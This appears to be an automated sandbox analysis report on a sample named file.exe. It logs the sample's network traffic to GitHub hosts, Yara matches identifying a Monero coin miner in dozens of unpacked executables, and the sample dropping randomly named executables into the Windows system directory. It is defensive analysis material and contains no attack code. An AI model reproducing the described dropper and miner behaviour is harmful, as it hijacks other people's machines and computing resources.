Source: global traffic	HTTP traffic detected: GET /assets/homebrew-c7e38eeacb52.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/globe-d6f3f4ee645a.jpg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/footer-copilot-54114bfd1d20.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/footer-mona-d1c861cd8018.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/footer-star-36e5b5724973.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/footer-diamond-ed642fc95144.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/footer-orb-a0438104a7a2.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/footer-blur-8bc8e1f23df6.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: time.windows.com
Source: global traffic	DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic	DNS traffic detected: DNS query: github.com
Source: global traffic	DNS traffic detected: DNS query: github.githubassets.com

Source: UqXZtcb.exe, 00000029.00000002.1405348535.00007FF7BBF71000.00000040.00000001.01000000.00000029.sdmp

String found in binary or memory: https://raw.githubusercontent.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443

Source: unknown	HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.7:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.7:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49788 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49789 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49820 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49821 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 38.2.xNhRSWh.exe.7ff699c10000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 17.2.MwFvbxc.exe.7ff7dc870000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 19.2.oxCQuSo.exe.7ff6c9f90000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 7.2.uxMRJKa.exe.7ff6bea80000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 13.2.bzSbRdi.exe.7ff7777f0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 39.2.jtnQpnb.exe.7ff7a86e0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 25.2.VHwkuIa.exe.7ff781ee0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 30.2.FGSooXz.exe.7ff654030000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 12.2.imwRXsl.exe.7ff74df50000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 6.2.wHnuprt.exe.7ff7c3b50000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 14.2.Csmwgyb.exe.7ff7b8680000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 37.2.ZTSJHKb.exe.7ff725c00000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 5.2.ERbKWDm.exe.7ff67dbc0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 32.2.nWSykjl.exe.7ff77c770000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 40.2.hEUEsIC.exe.7ff61c860000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 9.2.wkazDeV.exe.7ff68b300000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 20.2.vyHGCnK.exe.7ff6acaf0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 41.2.UqXZtcb.exe.7ff7bbf70000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 24.2.eVVPPqR.exe.7ff6e04e0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 4.2.xIpouRJ.exe.7ff6667f0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 26.2.WLWcTVM.exe.7ff6a8db0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 35.2.tyQdqmC.exe.7ff60fc20000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 11.2.wJNkgSa.exe.7ff700a70000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 31.2.mKdsHiQ.exe.7ff757760000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 15.2.defQfgC.exe.7ff6888b0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 10.2.VWrcuzM.exe.7ff748320000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 22.2.VFkciqc.exe.7ff602990000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 16.2.XZxtJFw.exe.7ff7a5920000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.2.WCbcoxD.exe.7ff7b66f0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 34.2.iHSYLud.exe.7ff7683d0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 29.2.fpHmIIc.exe.7ff6377f0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 28.2.QWtCxan.exe.7ff670a00000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 8.2.bJVoOik.exe.7ff6b3cd0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 18.2.hAOVVjq.exe.7ff77b680000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 36.2.sabRErB.exe.7ff795f20000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 33.2.LKurWpq.exe.7ff650b90000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 21.2.mbSqRHL.exe.7ff62c3e0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 23.2.sdTevgk.exe.7ff601280000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth

Creates files inside the system directory

Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\xIpouRJ.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ERbKWDm.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wHnuprt.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uxMRJKa.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\bJVoOik.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wkazDeV.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VWrcuzM.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wJNkgSa.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\imwRXsl.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\bzSbRdi.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\Csmwgyb.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\defQfgC.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\XZxtJFw.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\MwFvbxc.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\hAOVVjq.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\oxCQuSo.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\vyHGCnK.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mbSqRHL.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VFkciqc.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sdTevgk.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\eVVPPqR.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VHwkuIa.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WLWcTVM.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WCbcoxD.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\QWtCxan.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fpHmIIc.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\FGSooXz.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mKdsHiQ.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\nWSykjl.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\LKurWpq.exe	Jump to behavior
